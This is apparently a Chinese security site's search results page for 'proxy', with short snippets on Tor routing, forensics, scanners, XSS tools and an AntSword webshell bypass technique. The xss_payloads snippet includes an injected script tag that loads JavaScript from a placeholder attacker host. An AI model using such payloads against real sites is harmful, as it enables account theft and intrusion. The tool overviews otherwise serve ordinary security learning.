搜索 “代理”

NetSet介绍 NetSet旨在自动执行多个操作，以帮助用户保护网络流量。它还提供了一种通过Tor收集代理和运行实用程序的简便方法。NetSet安装和使用的也是自动配置，该工具主要用于辅助性网络安全任务。 实现了一种按需使用的终端多路复用器，它的会话通过Tor路由网关。通过自动安装和配置DNSCrypt-proxy来保护DNS流量。Tor Wall功能...

TOR Router增加隐私/匿名性 Tor Router允许您将TOR用作透明代理并在TOR包含DNS请求下发送所有流量，暗网也是基于Tor路由的。使用要求：systemd的系统（如果您想使用该服务）和tor，一般就是指Linux。 Tor-Router在运行过程中不会触碰系统文件，但其他的部分组件可能会涉及到系统文件，因为路由流量不需要涉及到文件移动，而且文件移动...

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞：alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

GRR Rapid Response远程实时取证工具 GRR Rapid Response是一种事件响应框架，专注于对Linux、macOS/OS X和Windows客户端远程执行实时取证分析。调查人员将Python代理安装到目标系统上后，可以远程实时分析内存，以便收集用于取证分析的数据证据，并执行详细的系统监控，监控CPU、处理器和输入/输出使用情况。GRR还使用SleuthKit让调查人...

SMProxy（Swoole MySQL Proxy） Swoole MySQL Proxy（以下简称SMProxy）是一个基于 MySQL 协议，Swoole 开发的MySQL数据库连接池。 原理 将数据库连接作为对象存储在内存中，当用户需要访问数据库时，首次会建立连接，后面并非建立一个新的连接，而是从连接池中取出一个已建立的空闲连接对象。 使用完毕后，用户也并非将连接关...

蚁剑AntSword Bypass Disable Functions 在昨天，蚁剑AntSword更新了新姿势「Bypass Disable Functions」，提供了另一种攻击思路，我们来过一遍。 原理分析 基于蚁剑的 FastCGI/PHP-FPM 模式和 AntSword-Labs 5 环境。蚁剑在服务器上传了 1 个 so 库和一个.antproxy.php，看下.antproxy.php代码： ...

WebPathBrute介绍 Windows下确实没有功能比较全又稳定的Web目录扫描暴力探测扫描工具了，此前用过破壳扫描器和dirburte都不稳定经常崩，御剑虽好，但是缺少很多小功能。 WebPathBrute WEB目录暴力破解 功能 先说说并发线程数吧（多线程），虽然默认是20 但是加大也无妨看你自己的各个参数设置和机器网络等配置了。超时时间自己...

w13scan介绍 w13scan是一款插件化基于流量分析的扫描器，通过编写插件它会从访问流量中自动扫描，基于Python3。 w13scan流程图 w13scan安装与使用 安装 git clone https://github.com/boy-hack/w13scan & cd w13scanpip3 install -r requirements.txtpython3 main.py 配置 Https支持 设置代理服务器(...

XSSCon介绍 XSSCon是一个用于扫描和利用XSS漏洞的工具，基于python 3.7编写。 XSSCon XSS扫描工具界面 主要特点 抓取网站上的所有链接（爬虫引擎）支持POST和GET表单许多可以自定义的设置高级错误处理多任务支持支持代理支持cookie等等.... XSSCon安装 apt-get install python3 git clone ...

Photon介绍 Photon一个高速的爬虫程序，显眼的区别是它不是像普通爬虫那样只爬取结构和静态资源，Photon被偏向设计为信息收集爬虫，它有非常灵活的规则设置和利于阅读的导出结果。 Photon爬虫logo Photon爬虫界面 功能特点 Photon可以在抓取时提取以下数据： 网址 (in-scope & out-of-scope)带参数的网址 (example.co...